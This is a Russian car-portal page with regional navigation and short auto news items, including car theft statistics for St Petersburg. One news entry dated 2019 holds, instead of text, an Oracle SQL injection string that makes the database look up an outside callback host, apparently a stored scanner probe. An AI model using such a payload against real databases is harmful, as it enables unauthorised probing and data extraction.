Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
30 июля 2010г.
Проект "народного автомобиля" Прохорова пополнился кроссовером

Группа "Онэксим" представила первые изображения-тизеры, демонстрирующие внешность будущих гибридных моделей, построенных в рамках проекта "Городской автомобиль" Михаила Прохорова.
Подробнее »
30 августа 2019г.
Mr.

'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.529-41391.529.a9e86.1.bxss'||'.me')||'
Подробнее »
29 сентября 2010г.
На "ТагАЗе" возобновилось производство автомобилей Hyundai

Таганрогский автозавод возобновил сборку автомобилей Hyundai — первой на конвейер встала модель Accent, сообщает газета "РБК daily" со ссылкой на неназванный источник, близкий к предприятию.
Подробнее »
ГИБДД находит лишь 3% угнанных автомобилей
Количество зарегистрированных угонов автомобилей в Санкт-Петербурге за I полугодие 2011 г. выросло на 14,5% – до 2552 эпизодов. Как сообщил журналистам заместитель начальника управления уголовного розыска по Санкт-Петербургу и Ленинградской области Владимир Удодов, найдено было лишь 82 угнанных автомобиля (3,6% от общего количества) – на 9 больше, чем за аналогичный период прошлого года. В Ленинградской области за шесть месяцев похищена 281 машина, что на 42 меньше, чем в I полугодии 2010 г., раскрыто 29 преступлений (10,7% от общего числа) – на 7 больше, чем год назад.



По данным угрозыска, самой угоняемой иностранной маркой автомобиля в Санкт-Петербурге стал Ford, на различные модели этой марки по итогам I полугодия 2011 г. приходится 14,3% угонов. На втором месте среди иномарок находится Chevrolet – 11,6%, на третьем – Mitsubishi. В первую пятерку по популярности у преступников также входят Honda (9,2%) и Mazda (8,9%). Чаще всего автомобили угоняют с неохраняемых стоянок, а также с парковок крупных супермаркетов.

Источник: Autonews
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика